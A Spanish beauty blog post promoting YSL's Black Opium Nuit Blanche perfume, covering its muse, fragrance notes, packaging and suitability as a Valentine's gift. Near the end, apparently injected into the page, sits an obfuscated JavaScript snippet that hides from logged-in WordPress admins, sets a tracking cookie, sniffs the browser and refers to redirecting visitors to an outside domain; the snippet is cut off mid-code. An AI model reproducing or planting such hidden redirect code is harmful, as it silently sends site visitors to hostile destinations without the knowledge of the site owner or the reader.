perfume black opium nuit blanche

La familia crece, y es que la gama más seductora de los perfumes Yves Saint Laurent tiene una nueva incorporación, que a simple vista ya apunta maneras.

Se trata de un eau de parfum, un aroma intenso que ha sido creado para su ya adorada gama Black Opium que se ha convertido en los perfumes de mujer más deseados en los últimos tiempos.

El nuevo perfume de mujer Black Opium Nuit Blanche una fragancia que nos invita a experimentar la noche con experiencias impredecibles el las que cualquier cosa puede suceder.

Edie Campbell sigue siendo la musa de YSL, la modelo británica pone su rostro y cuerpo como imagen del perfume pensado para las amantes de las largas noches que comienzan con fiesta y terminan entre notas de flores blancas y vainilla.

Como podéis intuir el nuevo perfume Black Opium Nuit Blanche parece una contradicción sus notas intensas se combinan con flores blancas de allí el nombre, aportando frescura y densidad.

¿A qué huele Black Opium Nuit Blanche de YSL ? Ya os hemos adelantado sus notas de flores blancas, pero vamos a ir desgranando su composición que no tiene desperdicio.

Como notas de salida un toque de pimienta bourbon continuando con peonía y el corazón de las flores de azahar del naranjo.

Como notas de fondo encontramos una combinación blanca que nos embriaga a base de vainilla, leche de almendras, almizcles blancos, madera de sándalo y café blanco.

Black Opium Nuit Blanche sigue en líneas generales el packaging de sus hermanas mayores  los perfumes Black Opium pero cambia su acabado que es lacado en negro y con destellos luminosos, casi blancos que la definen a la perfección con la idea que nos transmite la firma YSL Beauty.

yves-saint-laurent-black-opium-nuit-blanche-eau-de-parfum

 Black Opim Nuit Blanche es una estupenda elección para regalar este San Valentín,  una fragancia que representa la dualidad femenina y la perfecta compañera de nuestras largas noches de aventuras.

Os proponemos echar un vistazo a este cortito video en el que se define estupendamente la esencia del perfume Black Opium Nuit Blanche de YSL.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone